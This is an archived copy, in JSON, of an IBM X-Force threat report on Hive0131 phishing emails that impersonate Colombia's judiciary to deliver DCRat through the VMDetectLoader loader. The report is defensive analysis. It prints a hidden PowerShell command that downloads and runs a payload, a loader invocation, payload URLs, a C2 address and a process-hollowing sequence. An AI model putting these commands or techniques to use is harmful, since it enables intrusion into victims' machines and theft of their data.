{
	"id": "5b004acc-00fb-4cb6-abe5-0868522cae5f",
	"created_at": "2026-04-06T00:13:01.973531Z",
	"updated_at": "2026-04-10T03:21:53.369819Z",
	"deleted_at": null,
	"sha1_hash": "2c83d7e4fdbd9d776f9f0a7ab96b520945960b77",
	"title": "IBM X-Force Threat Analysis: DCRat presence growing in Latin America",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 974435,
	"plain_text": "IBM X-Force Threat Analysis: DCRat presence growing in Latin America\r\nBy Melissa Frydrych, Kevin Henson\r\nPublished: 2025-06-03 · Archived: 2026-04-05 20:18:55 UTC\r\nKevin Henson\r\nMalware Reverse Engineer\r\nIBM\r\nIn early May 2025, IBM X-Force observed Hive0131 conducting email campaigns targeting users in Colombia with electronic notifications of criminal proceedings, purporting to be from The Judiciary of Colombia. Hive0131 is a financially motivated group likely originating from South America that routinely conducts campaigns largely in Latin America (LATAM) to deliver a wide array of commodity payloads. The current campaigns imitate official correspondence and contain either an embedded link or a PDF lure with an embedded link. Clicking on the embedded link will initiate the infection chain to execute the banking trojan \"DCRat\" in memory.\r\nDCRat is operated as a Malware-as-a-Service (MaaS), first appearing in at least 2018, and heavily advertised on Russian cyber crime forums, purchasable for around USD 7 for a two-month subscription. DCRat's presence is widespread and has become increasingly popular in LATAM since at least 2024. Over the summer of 2024, X-Force observed several campaigns heavily targeting entities in Colombia, all imitating a LATAM company specializing in electronic document ecosystems in Mexico and Colombia. However, given the differences in infection chain and the delivery of DCRat, X-Force assesses that the 2024 and current campaigns were conducted by different actors. The campaigns observed in 2024 relied heavily on password-protected RAR files containing NSIS to execute a GuLoader downloader, whereas these recent campaigns rely on an obfuscated .NET loader we've named VMDetectLoader.
\r\nDCRat capabilities\r\nBypasses AMSI\r\nDetects analysis environments\r\nKills blocklisted processes\r\nObtains persistence through a scheduled task or registry key\r\nListens for commands from a command and control (C2) server\r\nDCRat comes with plugins that are capable of the following tasks, although threat actors can create custom plugins in order to accomplish additional tasks:\r\nRecording a victim through the computer's microphone or camera\r\nUploading and downloading files\r\nExecuting commands\r\nObtaining system information\r\nEncrypting and decrypting files\r\nEditing registry keys\r\nLogging keystrokes and clipboard data\r\nManipulating the filesystem\r\nhttps://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america\r\nPage 1 of 10\n\nThreat type\r\nAnalysis\r\nIn early May 2025, X-Force observed Hive0131 email campaigns imitating The Judiciary of Colombia (Rama Judicial de Colombia), purporting to be from the Civil Circuit of Bogota, Colombia, to send out electronic notifications of criminal proceedings. The observed campaigns either contain a PDF lure with a link to a TinyURL or contain an embedded link to a Google Docs location.\r\nInfection Chain Overview - PDF with TinyURL\r\nFor the emails containing a PDF lure leading to a tinyurl, the victim is redirected to a ZIP archive named 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.Uue. The ZIP archive contains benign files as well as a malicious JavaScript file named 1Juzgado 08 Civil Circuito de Bogotá Notificacion electronica Orden de Embargo.js. The JavaScript file downloads a JavaScript payload from a paste[.]ee site and executes it. This payload then executes a PowerShell command that downloads a JPG from hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg with a base64-encoded loader appended to the end of the file.
Once executed, the loader downloads and executes DCRat in memory.\r\nThe loader is given the name VMDetectLoader due to its ability to determine if it's running in a sandbox environment. Analysis indicates that the loader is based on the open-source project https://github.com/robsonfelix/VMDetector.\r\nFigure 1: RAMA Infection Chain\r\nFigure 2: Sample email with PDF lure\r\nInfection chain overview - Embedded Google Docs link\r\nThis infection chain is initiated with phishing emails that contain a link to a Google Docs download of a password-protected ZIP archive named CUI 158616000129-2025-10047_122011111777.zip, the password of which is in the email and is 3004. The archive contains a batch file downloader, CUI 158616000129-2025-10047_122011111777.bat, that downloads and executes an obfuscated VBScript (VBS) component from hxxp://paste[.]ee/d/jYHEqBJ3/0 to %WinDir%\\Temp\\Pernambuco.vbs. The VBS script subsequently decodes and executes a base64-encoded PowerShell script that downloads VMDetectLoader via a JPG file from hxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg.
\r\nThe final payload is then downloaded by VMDetectLoader via a paste[.]ee URL passed to it by the PowerShell script.\r\nFigure 3: RAMA infection chain with Google Docs\r\nFigure 4: Sample email with Google Docs link\r\nVMDetectLoader\r\nVMDetectLoader is an obfuscated .NET loader (Microsoft.Win32.TaskScheduler.dll) which can be found on VirusTotal at https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7.\r\nAnalysis of the loader's metadata indicates that the code is based on the open-source project https://github.com/robsonfelix/VMDetector.\r\nAssembly Attributes:\r\n[assembly: AssemblyVersion(\"1.1.0.0\")]\r\n[assembly: CompilationRelaxations(8)]\r\n[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]\r\n[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]\r\n[assembly: AssemblyTitle(\"VMDetector\")]\r\n[assembly: AssemblyCompany(\"Robson Felix\")]\r\n[assembly: AssemblyProduct(\"VMDetector\")]\r\n[assembly: AssemblyCopyright(\"Copyright © Robson Felix 2017\")]\r\n[assembly: AssemblyTrademark(\"\")]\r\n[assembly: TargetFramework(\".NETFramework,Version=v4.5\", FrameworkDisplayName = \"\")]\r\n[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]\r\nBefore loading the payload, the loader detects virtual machines, printing a list of host attributes to the console if a VM is detected.
For example:\r\nMOTHERBOARD INFO ================\r\nAvailability = 3\r\nCaption = Motherboard\r\nConfigManagerErrorCode =\r\nConfigManagerUserConfig =\r\nCreationClassName = Win32_MotherBoardDevice\r\nDescription = Motherboard\r\nDeviceID = Motherboard\r\nErrorCleared =\r\nErrorDescription =\r\nInstallDate =\r\nLastErrorCode =\r\nName = Motherboard\r\nPNPDeviceID =\r\nPowerManagementCapabilities =\r\nPowerManagementSupported =\r\nPrimaryBusType = PCI\r\nRevisionNumber =\r\nSecondaryBusType = ISA\r\nStatus = OK\r\nStatusInfo =\r\nSystemCreationClassName = Win32_ComputerSystem\r\nSystemName = DESKTOP-LettersNumbers\r\n--------------------------------------------------------------\r\nAsserting ?\r\nDetected as virtual machine given key computer information.\r\nDetected as virtual machine given bios information.\r\nDetected as virtual machine given hard disk information.\r\nDetected as virtual machine given PnP devices information.\r\nDetected as virtual machine given Windows services information.\r\nFunctionality\r\nVMDetectLoader is executed via its dnlib.IO.Home.VAI() function and passed data similar to the following. This information may vary depending on the campaign.\r\n[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]@($storeman,'','','','MSBuild','','','','','C:\\Users\\Public\\Downloads','rhabdosteus','js','','','bimetallism','1',''));\r\nArgument - Description\r\n$storeman - Reversed Pastee URL from which a base64-encoded payload is downloaded.\r\nMSBuild - Target injection process\r\nC:\\Users\\Public\\Downloads, rhabdosteus, js - Path used in creating a scheduled task: C:\\Users\\Public\\Downloads\\rhabdosteus.js\r\n1 - Flag that indicates process checks\r\nbimetallism - Scheduled task name\r\nDuring execution, VMDetectLoader XOR-decrypts notable strings as needed from the .NET resource \"hIXS\".\r\nSample decrypted strings\r\nvmware Microsoft Virtual PC {{ A = {0}, B = {1} }} -------------------------------------------------------------- Microsoft Hyper-V qemu vbox VirtualBox BiosCharacteristics {{ A = {0}, B = {1}, C = {2} }} SYSTEM\\CurrentControlSet\\Services\\ Caption {{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I = {8} }} Win32_ComputerSystem OEMStringArray Win32_BIOS Win32_MotherboardDevice Win32_PnPEntity Win32_DiskDrive MOTHERBOARD INFO ================ BIOS INFO ========= COMPUTER INFO ============= DEVICES INFO ============ HARD DRIVES INFO WINDOWS SERVICES virtual ImagePath name .exe Name Manufacturer Model Description Detected as virtual machine given PnP devices information. Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.\r\nPersistence\r\nIf configured to do so, a scheduled task is created to execute the following PowerShell command which downloads and executes a JavaScript payload:\r\n-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri '' -OutFile 'C:\\Users\\Public\\Downloads\\rhabdosteus.js'; Start-Process 'C:\\Users\\Public\\Downloads\\rhabdosteus.js'\"\r\nAnother task may be created, if configured, to execute the JavaScript payload using the following command:\r\nwscript.exe C:\\Users\\Public\\Downloads\\rhabdosteus.js\r\nThe loader may also create a Registry run key to execute the payload:\r\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run = \u003cpayload\u003e.js\r\nProcess injection\r\nVMDetectLoader has the ability to use the process hollowing injection technique to load a payload into varying target process instances. For example, for the analyzed campaign, C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe (32-bit) or C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe (64-bit) is the target process. The function responsible for process injection is named HackForums.gigajew.x64.Load() for 64-bit samples and dnlib.IO.Tools.Ande() for 32-bit samples.\r\nProcess hollowing injection process:\r\n1. Create a suspended process using CreateProcess() with the dwCreationFlags set to CREATE_SUSPENDED (4).\r\n2. Unmap memory in the target process using ZwUnmapViewOfSection().\r\n3. Allocate new memory in the target process using VirtualAllocEx().\r\n4. Write the payload to the newly allocated memory using WriteProcessMemory().\r\n5. Update the entry point for the process using GetThreadContext() and SetThreadContext().\r\n6. 
Execute ResumeThread() to execute the code.\r\nDCRat\r\nIf VMDetectLoader determines that it's running in a safe environment, the final payload is loaded via process hollowing. In this instance, the final payload is DCRat with the following configuration data.\r\n----- File: Client.exe -----\r\nParser: acce:DcRat\r\nDescription: DcRat Implant (qwqdanchun)\r\nArchitecture: x86\r\nMD5: eeed02e7ebbfe382b3d3af40fffb9ceb\r\nSHA1: f2f9b1205bfcccb738b03531a8bce39478443463\r\nSHA256: 1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140\r\nCompile Time: 2021-05-05T21:11:39+00:00\r\n---- Encryption Key ----\r\nTags: configuration | Key: 0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab | Algorithm: AES | Mode: CBC\r\nTags: configuration | Key: 0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527daca070bf4659624c77d28190f2f5c75e985d9a1d59f72086b8811 | Algorithm: HMAC-SHA256\r\n---- Interval ----\r\nValue: 1\r\n---- Mutex ----\r\nValue: DcRatMutex_qwqdanchun\r\n---- RSA Public Key ----\r\nTags: x509_certificate\r\nPublic Exponent (e): 65537 (0x10001)\r\n---- Socket ----\r\nTags: c2 | Address: feb18.freeddns.org | Port: 8848 | Network Protocol: TCP\r\n---- Version ----\r\nValue: 1.0.7\r\n---- Miscellaneous ----\r\nBSOD: False\r\ngroup: ::: 30  :::\r\nAntiProcess: False\r\nAnti: False\r\nself_installation_flag: False\r\nx509_certificate_serial_number: 1073276135051967865277505007812279690413261813057\r\nserver_signature_valid: True\r\n---- Logs ----\r\n[+] File Client.exe identified as DcRat Implant (qwqdanchun).\r\n[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected results include c2 socket addresses, a version, a mutex, aes-cbc decryption parameters, an SSL certificate and server signature, an interval, varying flags, and possibly a filepath and a group.\r\n[-] Cannot update settings field 0400000f.\r\n[+] A dead-drop resolver URL is not set in the configuration.\r\n[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.\r\n----- File Tree -----\r\n\u003cClient.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)\u003e\r\nConclusion\r\nX-Force tracks several groups operating in the Latin American threat landscape that conduct email campaigns delivering MaaS for the purpose of financial gain. Among the tracked groups are Hive0148 and Hive0149, which focus on delivering the Grandoreiro Banking Trojan, Hive0153 delivering Adwind and SambaSpy malware, and Hive0131. Although Hive0131 typically focuses on operations with the delivery of malware such as QuasarRAT and NjRAT, X-Force has observed an increase in campaigns involving DCRat. With steady and ongoing observations of banking malware delivered to users within LATAM, IBM X-Force assesses that Latin America will continue to face targeting from threat actors seeking to deploy banking trojans via phishing campaigns in attempts to obtain user credentials and other sensitive information.\r\nRecommendations\r\nEntities in LATAM are encouraged to exercise caution with emails containing attachments, links, or that prompt file downloads.
In addition, entities are advised to perform the following:\r\nExercise caution with emails containing links or download prompts\r\nMonitor for host-based evidence of process injection, rogue process creation, scheduled task creation, and registry modifications\r\nInstall, update and configure endpoint security software\r\nMonitor endpoint rules\r\nHunt for the execution policy bypass\r\nIndicators of compromise\r\nIBM X-Force Premier Threat Intelligence is now integrated with OpenCTI, delivering actionable threat intelligence about this threat activity and more. Access insights on threat actors, malware and industry risks. Install the OpenCTI Connector to enhance detection and response, strengthening your cybersecurity with IBM X-Force’s expertise. Stay ahead—integrate today.\r\nSource: https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.ibm.com/think/x-force/dcrat-presence-growing-in-latin-america"
	],
	"report_names": [
		"dcrat-presence-growing-in-latin-america"
	],
	"threat_actors": [],
	"ts_created_at": 1775434381,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2c83d7e4fdbd9d776f9f0a7ab96b520945960b77.pdf",
		"text": "https://archive.orkl.eu/2c83d7e4fdbd9d776f9f0a7ab96b520945960b77.txt",
		"img": "https://archive.orkl.eu/2c83d7e4fdbd9d776f9f0a7ab96b520945960b77.jpg"
	}
}